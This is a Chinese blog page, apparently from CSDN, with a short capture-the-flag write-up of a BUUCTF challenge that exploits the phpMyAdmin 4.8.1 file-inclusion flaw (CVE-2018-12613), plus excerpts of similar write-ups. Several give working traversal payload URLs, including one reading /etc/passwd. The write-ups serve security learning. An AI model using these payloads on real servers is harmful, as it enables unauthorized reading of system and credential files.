## [GWCTF 2019]我有一个数据库### 1

最新推荐文章于 2024-10-18 13:18:35 发布

羊一凡

最新推荐文章于 2024-10-18 13:18:35 发布

阅读量140

点赞数 3

文章标签：安全 web安全

本文链接：https://blog.csdn.net/sulide_moon/article/details/138579604

版权

存在phpinfo.php文件

目录扫描出目录下有phpmyadmin管理页面并且不需要密码就可以登录

此处考察了phpmyadmin 4.8.1 远程文件包含漏洞

影响版本

phpMyAdmin 4.8.0和4.8.1

在这里插入图片描述

漏洞成成因：是因为在以上两个版本中的target变量限制不完全所导致的的，存在命令执行漏洞，因为

在这里插入图片描述

构造payload：

http://acd954ec-2c08-4199-94e1-14f1d9e8a452.node5.buuoj.cn/phpmyadmin/index.php?target=db_export.php%253f/../../../../../../../../flag

就可以直接查看flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

羊一凡

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

BUU刷题--[GWCTF 2019]我有一个数据库

weixin_48631429的博客

12-02

593

我有一个数据库 打开看到这样一堆文字，读不懂，也没有其他的信息。怎么想也想不到该怎么做，buu还不能扫描。所以只能看了wp，看到有一个/phpmyadmin，回来开始想怎么做 phpmyadmin版本信息4.8.1，搜索一下有什么漏洞。任意文件包含：那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...

[GWCTF 2019]我有一个数据库 1

qq_43618536的博客

07-21

784

[GWCTF 2019]我有一个数据库 1

2 条评论您还未登录，请先登录后发表或查看评论

[GWCTF 2019]我有一个数据库

siu~

09-15

187

[GWCTF 2019]我有一个数据库 解题

[GWCTF 2019]我有一个数据库 wp

m0_55185160的博客

04-23

4403

得到了/phpmyadmin/路径，加上题目是我有一个数据库，于是想到应该本题就是和phpmyadmin数据库有关我们可以看到phpmyadmin的版本为4.8.1，搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613，下面我们复现一下漏洞。首先分析一下源码： index.php 关于target的部分 $target_blacklist = array ( 'imp..

web buuctf [GWCTF 2019]我有一个数据库1

weixin_44214568的博客

03-26

3522

1.直接放弃御剑了，在buu上扫不到，我自己登录先看了一下有没有robots.txt，有，但是没有扫到，我用了disearch，设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来

[GWCTF 2019]我有一个数据库1

kw741951的博客

08-03

263

打开题目，一串乱码，不认识的汉字。

buuctf-[[GWCTF 2019]我有一个数据库（小宇特详解）

小宇的web博客

02-12

631

buuctf-[[GWCTF 2019]我有一个数据库（小宇特详解）这里不知道什么原因显示的乱码直接使用dirsearch对网站进行扫描吧这里扫到了phpmyadmin目录，无密码直接登录成功。这里给出了版本号MySQL数据库Version 4.8.1。这个版本有文件包含漏洞漏洞原理是利用/使db_datadict.php?成为一个不存在目录，利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi

BUUCTF-[GWCTF 2019]我有一个数据库 1

ITgougou_的博客

12-23

290

phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞影响版本：4.8.0——4.8.1payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd本题payload：/phpmyadmin/?target=db_datadict.php%253f/../../.....

[GWCTF 2019]我有一个数据库（特详解）

热门推荐

qq_74806534的博客

01-31

1万+

记下来就是利用文章里的payload了，这里../回到上一级目录，只要多于5个，能回到根目录就行，etc/passwd是linux存放用户和密码的文件，在根目录。页面一开始乱码，先教大家应该修复的方法，到火狐打开，然后找到小工具里的修复文字编码，就可以了（没有的话可以在定制工具栏里添加）在界面可以查到各服务器的版本，可以去百度各版本服务器的漏洞。他说什么都没有，先dirsearch扫一下。直接看上面那个师傅的文章，十分详细的。查看其他的吧，有个数据库看看去。这里就不一样查了，直接上结论。

BUUCTF WEB [GWCTF 2019]我有一个数据库

Y1da的博客

04-27

437

BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库，但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他

BUUCTF[GWCTF 2019]我有一个数据库

LSYZWF的博客

10-12

1781

文章目录题目解答漏洞分析知识点题目链接：https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码，看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放，也可以通过数据库工具进行连接测试，但是这里使用的是phpmyadmin 随便翻阅了一下，得不到有用的东西，也证实了上面什么都没有的说法 4、从

[GWCTF 2019]我有一个数据库(文件包含漏洞)

weixin_44110537的博客

10-03

430

一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.

BUU [GWCTF 2019]我有一个数据库

cadandme的博客

05-11

231

刷了一道web题，记录做题过程。打开页面看到打开源码，尝试解码。试了UTF-8，尝试把得到的数据导成文档。结果是乱码，走入了死胡同。数据库，数据库，又想到扫描目录，在kali扫描，发现东西先看txt，再看phpinfo.php 到这里彻底不懂了，瞎搞了没看出东西后，看了大佬的wp，说是phpmyadmin 4.8.1 远程文件包含漏洞（CVE-2018-12613）后面跟着wp来，可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/

[GWCTF 2019]我有一个数据库 cve漏洞利用&&phpmyadmin&&文件包含&&漏洞分析

qq_37301470的博客

11-28

246

[GWCTF 2019]我有一个数据库 buu是禁止目录扫描的怪不得我总是扫不到东西还以为自己的dirsearch坏了看网上的WP发现有 robots.txt phpinfo.php phpmyadmin 百度一下 phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。版本是5.5.62 搜索这个版本的漏洞漏洞介绍其中出现了一个不认识的函数 mb_substr($x,1,1)中文字符的截取

CTFHUB技能树之HTTP协议——响应包源代码

weixin_73049307的博客

10-13

515

点击“开始”没有抓取到报文，先看看网页源代码是什么情况。居然直接给出flag了，不知道这题的意义何在。是个贪吃蛇小游戏，看不出来有什么特别的地方。

等保测评：如何进行有效的安全合规性审查